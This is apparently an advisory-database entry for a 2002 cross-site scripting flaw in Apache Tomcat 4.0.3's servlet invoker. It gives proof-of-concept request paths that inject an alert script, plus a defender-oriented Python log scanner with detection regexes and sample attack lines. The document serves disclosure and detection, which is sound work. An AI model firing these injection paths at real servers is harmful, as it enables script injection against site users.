Vendor: Tomcat
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 79 (Cross Site Scripting)
Product Name: Tomcat
Affected Version From: 4.0.3
Affected Version To: 4.0.3
Patch Exists: YES
Related CWE: N/A
CPE: apache:tomcat:4.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows and Linux
2002

Cross Site Scripting in Apache Tomcat 4.0.3

When servlet mapping is enabled, various servlets and classes can be invoked directly, causing Apache Tomcat to throw an exception. This makes cross-site scripting attacks possible.

Mitigation:

Disable servlet mapping and ensure that all input is validated.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5193/info

A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible. 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>
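
For defenders reviewing access logs, the following added example (not part of the original advisory or of Tomcat) flags requests that match the pattern listed above: a `/servlet/<fully.qualified.ClassName>/` path followed by HTML metacharacters. It assumes Common Log Format lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format request field: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Invoker-style path: /servlet/<fully.qualified.ClassName>/<extra path info>
INVOKER_RE = re.compile(r'/servlet/(?P<cls>[A-Za-z_][\w$]*(?:\.[\w$]+)+)/(?P<extra>.*)', re.S)
# Characters that start markup if echoed unescaped into an HTML error page
MARKUP_RE = re.compile(r'[<>"\']')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so %253C and %3C are both seen as '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_invoker_requests(log_lines):
    """Return (line_number, class_name, decoded_extra_path) for flagged lines."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST_RE.search(line)
        if not request:
            continue
        path = decode_fully(request.group("target").split("?", 1)[0])
        match = INVOKER_RE.search(path)
        if match and MARKUP_RE.search(match.group("extra")):
            hits.append((number, match.group("cls"), match.group("extra")))
    return hits


# Constructed sample access-log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2002:10:00:01 +0000] "GET /index.jsp HTTP/1.0" 200 1432',
    '192.0.2.11 - - [10/Jul/2002:10:00:05 +0000] "GET /servlet/org.apache.catalina.Globals/%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E HTTP/1.0" 500 2210',
    '192.0.2.12 - - [10/Jul/2002:10:00:09 +0000] "GET /servlet/com.example.ReportServlet/summary HTTP/1.0" 200 804',
    '192.0.2.13 - - [10/Jul/2002:10:00:12 +0000] "GET /servlet/org.apache.catalina.Context/%253Cb%253E HTTP/1.0" 500 2198',
]

if __name__ == "__main__":
    for hit in suspicious_invoker_requests(SAMPLE_LOG):
        print(hit)
```

Hits on this pattern also show whether the `/servlet/` mapping is still reachable, which is what the mitigation above asks to disable.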